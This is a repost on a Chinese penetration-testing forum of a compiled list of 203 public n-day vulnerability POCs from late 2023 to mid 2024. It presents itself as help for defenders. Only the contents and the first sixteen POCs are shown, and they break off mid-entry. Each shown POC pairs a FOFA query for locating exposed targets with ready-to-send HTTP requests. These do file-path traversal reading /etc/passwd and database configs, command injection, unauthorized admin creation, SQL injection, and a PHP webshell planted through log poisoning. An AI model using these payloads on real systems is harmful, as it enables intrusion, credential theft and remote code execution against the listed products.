中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]

---

作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406
( W1 d5 m  ~; D道一安全 2024-06-05 07:41 北京
$ }. f: J# ~& n4 c+ ~. v以下文章来源于网络安全新视界 ，作者网络安全新视界

4 b4 l- g. P# W% ^: M. n2 f发文目的：Nday漏洞的利用是安全攻防占比较大的攻击方式，希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。

漏洞来源：文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个，均来自于互联网其他公众号或者网站，由网络安全新视界团队进行整理发布。

8 C7 R8 ^7 [2 ?6 z4 l3 a3 e安全补丁：所有的漏洞均为公开漏洞，补丁或漏洞修复方案请联系产品厂家。
! j0 k; _( j3 j1 I7 c, i
文章内容：因受篇幅限制，个别漏洞POC由于过长，统一使用PAYLOAD字样代替，如需完整POC请自行搜索。

合法权益：如文章内容侵犯某方合法权益，请后台联系网络安全新视界团队对相关内容进行删除。
9 m8 v) F2 o- {3 s8 R$ K
5 a" i' k- Z' C" ]) w
声明
; _) o" y9 k, f! n- Q) v$ U, g
为简化流程，方便大家翻阅，固不设置“回复再给完整列表”。本文章就是当前最全文章，使用时F12搜索关键词即可。
$ m2 q& b$ K" m* L  m: M! ^; ^
有需要的可以收藏此文。也可以关注本公众号（网络安全新视界）。
, O6 Z* j* n4 H, `
- \2 d& ]( j* t7 ^+ V
/ c0 g5 j- R* |3 n% s! J
9 t/ G1 h( m! T6 _" S* v. n目录
% N2 v6 a$ w% \5 x: V+ o2 q1 q$ Y
01
  g# r4 N" g- |; v% X. \0 C
1. StarRocks MPP数据库未授权访问
( [, x8 U/ J4 L' _, b- b2. Casdoor系统static任意文件读取
7 G* L" K; z  q3. EasyCVR智能边缘网关 userlist 信息泄漏
0 ]9 E1 W, p. y6 I  O( D# }8 T4. EasyCVR视频管理平台存在任意用户添加
5. NUUO NVR 视频存储管理设备远程命令执行
# [5 k; P, a: V$ Z: J# {6. 深信服 NGAF 任意文件读取
7. 鸿运主动安全监控云平台任意文件下载
! h* b9 Q, {4 ~0 }$ O/ _, A7 T8. 斐讯 Phicomm 路由器RCE
# u6 @1 }) d) L5 d9. 稻壳CMS keyword 未授权SQL注入
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
12. Jorani < 1.0.2 远程命令执行
13. 红帆iOffice ioFileDown任意文件读取
14. 华夏ERP（jshERP）敏感信息泄露
15. 华夏ERP getAllList信息泄露
9 @9 q: x$ H  M9 P# {# b16. 红帆HFOffice医微云SQL注入
$ F  Q2 k. S2 ?8 B; i17. 大华 DSS itcBulletin SQL 注入
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
20. 大华ICC智能物联综合管理平台任意文件读取
21. 大华ICC智能物联综合管理平台random远程代码执行
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ F) u; K( a2 Z( y0 b9 K24. 用友NC 6.5 accept.jsp任意文件上传
25. 用友NC registerServlet JNDI 远程代码执行
26. 用友NC linkVoucher SQL注入
27. 用友 NC showcontent SQL注入
- i" u: h2 R: E4 }$ H" _3 R" l& p28. 用友NC grouptemplet 任意文件上传
! I9 o5 `9 p% h. u7 i9 |# m29. 用友NC down/bill SQL注入
30. 用友NC importPml SQL注入
31. 用友NC runStateServlet SQL注入
/ t, v7 ?# v5 r" ?- r! |# G32. 用友NC complainbilldetail SQL注入
33. 用友NC downTax/download SQL注入
5 m: ~& O9 Y7 b+ P0 X, N34. 用友NC warningDetailInfo接口SQL注入
. {5 A$ e$ K; W  W) H2 E5 D8 _35. 用友NC-Cloud importhttpscer任意文件上传
36. 用友NC-Cloud soapFormat XXE
" z( x2 @  v3 j  V7 K* Z6 d37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL注入
& `2 V& D, I, z5 |4 p( h. T" O40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
42. 用友GRP-U8 SmartUpload01 文件上传
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
45. 用友GRP-U8 ufgovbank XXE
" X  k: Q7 `7 U6 M  K4 S. x2 s8 J46. 用友GRP-U8 sqcxIndex.jsp SQL注入
47. 用友GRP A++Cloud 政府财务云 任意文件读取
48. 用友U8 CRM swfupload 任意文件上传
, Q! T! d6 q- u2 H2 g0 C/ [8 C49. 用友U8 CRM系统uploadfile.php接口任意文件上传
50. QDocs Smart School 6.4.1 filterRecords SQL注入
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
52. 泛微E-Office json_common.php sql注入
53. 迪普 DPTech VPN Service 任意文件上传
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
5 i3 l# A4 o8 a5 n+ d55. 畅捷通T+ getdecallusers信息泄露
8 o6 u+ k0 }. J# j3 L; r' X+ E56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
57. 畅捷通T+ keyEdit.aspx SQL注入
6 e% g/ `& s$ m7 c58. 畅捷通T+ KeyInfoList.aspx sql注入
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" ?5 I8 ?, [" Z60. 百卓Smart管理平台 importexport.php SQL注入
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& q8 X  r% u; s1 O62. IP-guard WebServer 远程命令执行
. p5 Q1 X2 U  H( k  u63. IP-guard WebServer任意文件读取
& K5 _- \; H2 Z64. 捷诚管理信息系统CWSFinanceCommon SQL注入
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
: l! R1 B& i/ O+ X3 V9 h66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
& [$ Z* e  ^6 y1 ~6 O8 J67. 万户ezOFFICE wpsservlet任意文件上传
68. 万户ezOFFICE wf_printnum.jsp SQL注入
' Y0 _& @% _: n* `69. 万户 ezOFFICE contract_gd.jsp SQL注入
! h6 E; f. h. S( d7 s70. 万户ezEIP success 命令执行
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms远程代码执行
. {5 \. Y, V8 E; L74. 致远M3-server 6_1sp1 反序列化RCE
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
. H( R& \6 P( j; Y4 X9 h76. 新开普掌上校园服务管理平台service.action远程命令执行
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
" z0 {/ l4 w+ M' @0 E78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
79. BYTEVALUE 百为流控路由器远程命令执行
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# g) ]1 @6 Z- S: s( Q; P8 ^81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
( ~$ ~, i7 t7 [& `82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
83. JeecgBoot testConnection 远程命令执行
4 B# }4 s9 g3 g: r84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
9 Z: V" ^. u0 \* b85. SysAid On-premise< 23.3.36远程代码执行
86. 日本tosei自助洗衣机RCE
87. 安恒明御安全网关aaa_local_web_preview文件上传
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
. K6 X7 l3 K/ L# d0 f89. 致远互联FE协作办公平台editflow_manager存在sql注入
* M! w; v9 W1 ]3 L( S! p1 ]+ C90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
8 a" a  n6 X8 N; ?' k* S91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
6 P( q3 U: W/ B& F. [3 Z6 e4 I7 P" @92. 海康威视运行管理中心session命令执行
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
+ r2 `" r2 F% f. w/ ^% N94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
# I0 ]( Y' ?, u) @' H: L96. Apache OFBiz  18.12.11 groovy 远程代码执行
; n. C$ D: ~0 [8 |- U" v+ |97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
6 A% g; N/ s. S* n+ y2 }' Q98. SpiderFlow爬虫平台远程命令执行
4 ?1 Y  o3 O( e% q99. Ncast盈可视高清智能录播系统busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
101. ivanti policy secure-22.6命令注入
) g: f9 s' a  _102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
105. SpringBlade v3.2.0 export-user SQL 注入
9 @( w: {  I$ ~5 q106. SpringBlade dict-biz/list SQL 注入
( o/ D3 H: b( ~; c  x% s107. SpringBlade tenant/list SQL 注入
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI 任意文件读取
110. Goanywhere MFT 未授权创建管理员
4 U; h) T5 z. X6 ]1 k' F0 c; H111. WordPress Plugin HTML5 Video Player SQL注入
112. WordPress Plugin NotificationX SQL 注入
  P+ v0 A; {8 E' q' k113. WordPress Automatic 插件任意文件下载和SSRF
114. WordPress MasterStudy LMS插件 SQL注入
115. WordPress Bricks Builder <= 1.9.6 RCE
116. wordpress js-support-ticket文件上传
117. WordPress LayerSlider插件SQL注入
; o$ ]5 j& N7 Q/ s" l) q6 U0 g118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
119. 北京百绰智能S20后台sysmanageajax.php sql注入
% C2 H5 L+ w2 s) {& |7 ?/ |3 T120. 北京百绰智能S40管理平台导入web.php任意文件上传
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
0 n& ?+ x+ s8 |1 z" N2 \122. 北京百绰智能s200管理平台/importexport.php sql注入
# g$ c9 P! B% x0 C  a6 T% l0 M) x$ G+ W123. Atlassian Confluence 模板注入代码执行
124. 湖南建研工程质量检测系统任意文件上传
125. ConnectWise ScreenConnect身份验证绕过
126. Aiohttp 路径遍历
, f$ h4 U# q; u0 Q0 c127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion 反序列化
+ U3 n7 x  _2 u2 N( }- c4 b129. Adobe ColdFusion 任意文件读取
130. Laykefu客服系统任意文件上传
0 U* e5 r7 ^/ G131. Mini-Tmall <=20231017 SQL注入
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
133. H5 云商城 file.php 文件上传
( N% g- q1 C% u, [# z134. 网康NS-ASG应用安全网关index.php sql注入
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
* {: W$ O# f: X9 Q+ b3 _2 p, M: \136. NextChat cors SSRF
& c3 p! |1 ]5 c  K& D  k0 o& f  O137. 福建科立迅通信指挥调度平台down_file.php sql注入
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
. {, Z- M1 x5 ~) ^! f) `# A* Y; ]139. 福建科立讯通信指挥调度平台editemedia.php sql注入
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
: e1 j% x! u+ y, e142. CMSV6车辆监控平台系统中存在弱密码
143. Netis WF2780 v2.1.40144 远程命令执行
5 }7 m* ^& k- x, {5 O8 Y5 q144. D-Link nas_sharing.cgi 命令注入
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
146. MajorDoMo thumb.php 未授权远程代码执行
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
' A/ m  l- p* i4 `: R3 C4 H7 j148. CrushFTP 认证绕过模板注入
+ d2 j9 f% x. \) J6 y149. AJ-Report开源数据大屏存在远程命令执行
# r- l# c2 P7 p8 x; ^9 `* x150. AJ-Report 1.4.0 认证绕过与远程代码执行
9 e( e7 w* P7 v7 z$ @: _: H3 E151. AJ-Report 1.4.1 pageList sql注入
152. Progress Kemp LoadMaster 远程命令执行
153. gradio任意文件读取
154. 天维尔消防救援作战调度平台 SQL注入
4 o% u; x3 L& ~! L155. 六零导航页 file.php 任意文件上传
156. TBK DVR-4104/DVR-4216 操作系统命令注入
$ r1 N% f/ `  r* L157. 美特CRM upload.jsp 任意文件上传
158. Mura-CMS-processAsyncObject存在SQL注入
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
160. Sonatype Nexus Repository 3目录遍历与文件读取
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
! `' L1 L9 Q8 N: m162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
165. OrangeHRM 3.3.3 SQL 注入
1 s9 o( G+ Q7 n$ E166. 中成科信票务管理平台SeatMapHandler SQL注入
) N2 X9 G1 c1 i: m  r  k: _' s167. 精益价值管理系统 DownLoad.aspx任意文件读取
/ X9 h" C" S: T3 U) n0 Q4 y168. 宏景EHR OutputCode 任意文件读取
+ J4 U: O. h! A169. 宏景EHR downlawbase SQL注入
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
171. 通天星CMSV6车载定位监控平台 SQL注入
4 m% R: @. G( ]4 j% M' Z172. DT-高清车牌识别摄像机任意文件读取
% s, p& F  S( Z2 K) d" I173. Check Point 安全网关任意文件读取
- S/ ~) l" W9 S$ j. M: h8 X174. 金和OA C6 FileDownLoad.aspx 任意文件读取
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
176. 电信网关配置管理系统 rewrite.php 文件上传
. p# d$ |- y& y! K+ L' O* l! B# {177. H3C路由器敏感信息泄露
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
  e: _5 a% Y7 V* s179. 建文工程管理系统存在任意文件读取
180. 帮管客 CRM jiliyu SQL注入
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
: f: X7 F- f8 c( ]182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 T8 E( I6 g( E  W183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
% Y8 S4 o' @0 ~9 j- q( O) F185. 瑞友天翼应用虚拟化系统SQL注入
186. F-logic DataCube3 SQL注入
187. Mura CMS processAsyncObject SQL注入
6 D7 a% ], M" D+ f6 d188. 叁体-佳会视频会议 attachment 任意文件读取
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
: J: d- Z  f! N, h; w+ q190. 短视频矩阵营销系统 poihuoqu 任意文件读取
  s# F# R9 J* f4 H6 O% m9 G3 g191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
; o( _/ Z" o4 w) j192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( I6 e" N/ s, Z7 U$ H193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
+ h& t  \" m; F2 H5 f9 c194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
  o3 R9 f# Z, P' m) V195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
: `. d' R! r6 F196. 河南省风速科技统一认证平台密码重置
  g% m+ k( u8 |+ J& w3 L; S, Q1 i197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
198.  阿里云盘 WebDAV 命令注入
199. cockpit系统assetsmanager_upload接口 文件上传
* g; z" k$ o# d6 O% K" i4 q3 y200. SeaCMS海洋影视管理系统dmku SQL注入
201. 方正全媒体新闻采编系统 binary SQL注入
2 A. l8 z+ k! r) E& `202. 微擎系统 AccountEdit任意文件上传
; x1 [0 R" Q" O: a3 H- v; O8 T203. 红海云EHR PtFjk 文件上传
, I5 o0 d  q  C+ [  F
POC列表
4 z- m3 {' `8 H: `* _" B
! C/ l/ S$ {# G02
" X4 _4 k# i: Z0 P
1. StarRocks MPP数据库未授权访问
- J- _4 `5 }  S9 gFOFA ：title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

; z& C0 t& z9 ~
. F! U) N! K9 Q( d: [4 `2. Casdoor系统static任意文件读取
FOFA ：title="Casdoor"
& x# d; r: A% oGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
* w' Z/ H- r( }User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

9 D. J& D2 x! [( b7 l& e
  ?8 \$ j, s0 }3 c$ d) H  Q3. EasyCVR智能边缘网关 userlist 信息泄漏
FOFA ：title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


- {9 W6 X3 {% m$ a- A- X6 D- R0 T1 @1 {4. EasyCVR视频管理平台存在任意用户添加
+ y3 e: P; ?! u+ hFOFA ：title="EasyCVR"
; Q* b- I  l# d4 W; k& l; U8 Q- K2 W
' G! P8 x& F5 P+ d. Ppassword更改为自己的密码md5
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3 w) B0 w8 E7 G& [5 a- p
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5 Q1 b$ l- l" w9 |5. NUUO NVR 视频存储管理设备远程命令执行
FOFA：title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx
$ e. P& [9 L% {; F% ^. a

% ?2 w4 V& m6 ]. f* b: a  j6. 深信服 NGAF 任意文件读取
* w, u5 x) s# A, R8 Y% }; uFOFA：title="SANGFOR | NGAF"
# M- F# j0 Y3 E0 X- p' SGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


6 [6 k4 q5 r2 x  m7. 鸿运主动安全监控云平台任意文件下载
FOFA：body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:
7 `# ~/ C/ H$ u

. _, i. \! S6 a8. 斐讯 Phicomm 路由器RCE
% r8 k; y$ l- o$ B/ T. z  C4 A! PFOFA：icon_hash="-1344736688"
默认账号admin登录后台后，执行操作
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
5 W0 h8 S' @8 q, u( L, V7 Q  ]Host: x.x.x.x
8 C' ~4 Q# m# A1 t; A4 y1 ]Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"
  _3 C0 T, U$ V% H
  Y. s& T3 q& V" C) c& q# p" t' ?%s
------WebKitFormBoundaryxbgjoytz
3 @6 Q2 b" y/ n" E" ^' D. n& C" HContent-Disposition: form-data; name="wifiRebootrange"
) E9 ~1 E0 a1 M0 {. P0 [
12:00; id;
, b' }# W' F6 r2 C: r) {' `$ \------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

4 U% W% {' S, }& i9 ?  H
& W. F" M: R  i& ]+ w- W------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword 未授权SQL注入
5 S7 `! Z0 Z9 V1 gFOFA：app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
, P1 s# x; U0 a' r: o( x/ NHost: x.x.x.x

: {, Q9 S3 g- _! f: ~$ b( Z# a
0 a- E- M+ m: `* i( Y  h  Ypayload为下列语句的二次Url编码

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
$ ~. |0 _( h2 {( n3 O$ Y1 Q- gFOFA：icon_hash="953405444"
4 ~9 I$ k$ }- P7 O/ }
文件上传后响应中包含上传文件的路径
  [& ^1 i8 f/ |1 O) CPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ u. u; r: ~% U) h8 _9 d+ Y* }Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
3 k: X. p2 p7 ~; CContent-Length: 197
# r9 M6 o9 e" N  X1 L# G9 Z% N+ FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
+ |6 L' X4 k" O* Q2 K" a) I1 ?; b, |/ rAccept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

. v. ?9 W3 {0 @: R' R+ X# t! \------WebKitFormBoundaryxdgaqmqu
4 z" k, m9 X* [( e' I4 N) C# kContent-Disposition: form-data; name="file"filename="icfitnya.txt"
. p  V5 U6 r# C' t: q9 N* TContent-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--
% A0 B) B) Q5 G$ e; u: M% I
' u) n( Q4 {* L8 \7 c8 ^" T) H- ~
; T8 s: [8 a4 {/ x! I11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
! F+ y8 N8 }. ~- }9 U# wFOFA：icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
3 C2 N, e5 \5 i/ T2 D) xHost: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
: Q* X* J4 O" b4 L9 v$ L" _% a- dUpgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  b3 A) e4 l3 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
: Z* f" g+ ^! b/ b) _. v8 i# PConnection: close

/ K8 P. K9 l3 i% c: x" f
5 K; ]: ]6 ^" |8 z0 P12. Jorani < 1.0.2 远程命令执行
5 e" `$ e+ S8 k! Z  p+ vFOFA：title="Jorani"
( d" ~9 O' m) X2 E5 Z第一步先拿到cookie
$ T' F9 e8 h* A; W: C2 bGET /session/login HTTP/1.1
* f/ M0 ]( \; r, X0 M6 xHost: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
( K. A' t6 p9 ~* w) k8 IAccept-Encoding: gzip

/ p0 _* A5 d( m$ e% J
响应中csrf_cookie_jorani用于后续请求
HTTP/1.1 200 OK
& S9 D- @+ A4 c' l# W+ [% @Connection: close
# ]4 o# Q) z; J# i2 p7 qCache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
, [4 S0 {% a$ W/ {9 _Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding
4 z* c6 [+ j' f  S6 F/ D
# A: f# g& e% Y% d, C4 l: U# \
POST请求，执行函数并进行base64编码
POST /session/login HTTP/1.1
Host: 192.168.190.30
, {) v* U. ]; q& LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
3 S1 B, o' S( K; Z. D7 CConnection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
0 z4 r# D  u9 }! z0 Y5 V+ oCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
' c) S# V$ {1 z, b- x6 ?8 B0 fAccept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
, F  l' \+ k3 ]( I6 ?* S0 V

, Y; r& I2 V4 a. ^* i
* q; V* O9 V9 Q3 a3 P! ?; y向靶场发送如下请求，执行id命令，请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 `- ~- U& A3 r. SGET /pages/view/log-2023-10-24 HTTP/1.1
( A' X! e; u: V6 u( THost: 192.168.190.30
' z7 }% D8 d. GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 h9 F) A5 t1 ^4 l. i6 G& {2 oConnection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
( h2 O# X6 N9 e5 A& CK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

2 y9 h: f5 k# B; U6 T: o
13. 红帆iOffice ioFileDown任意文件读取
* b( b* N8 R$ {4 H! fFOFA：app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
; P4 \/ F/ ?; M$ i' EHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" i) o8 ?  H$ d+ ]Connection: close
+ F) |1 e  Z/ ~; T! |' oAccept: */*
. ]; q; y9 `: p+ r1 Z4 qAccept-Encoding: gzip


14. 华夏ERP（jshERP）敏感信息泄露
( T( R+ e" @4 `FOFA：body="jshERP-boot"
; d7 L+ s( q: N" c8 \+ [  ^! a泄露内容包括用户名密码
7 c2 z# o" J& jGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
) u5 S7 _9 l& O* ~' XHost: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
, z& [* |5 j& c! Y. fConnection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
* |  t; q4 k. B

& {. E* x9 Y" B0 a& i+ \15. 华夏ERP getAllList信息泄露
& P* T5 \$ z  a% y1 G* h! dCVE-2024-0490
' M1 {2 f/ ]7 O  j2 YFOFA：body="jshERP-boot"
泄露内容包括用户名密码
+ ]" C( A/ ~: t5 TGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
" Z; l. m. s& [Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) Q. T5 k" E% c& r/ kConnection: close
8 ~) h4 C1 u# n, qAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
) e& ?' {8 N" I2 o$ T/ U( bAccept-Encoding: gzip


16.  红帆HFOffice医微云SQL注入
FOFA：title="HFOffice"
( ?- U; c: A$ p" o  J. ?. Ipoc中调用函数计算1234的md5值
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
, B! x* D* ^% c. b) z+ mHost: x.x.x.x
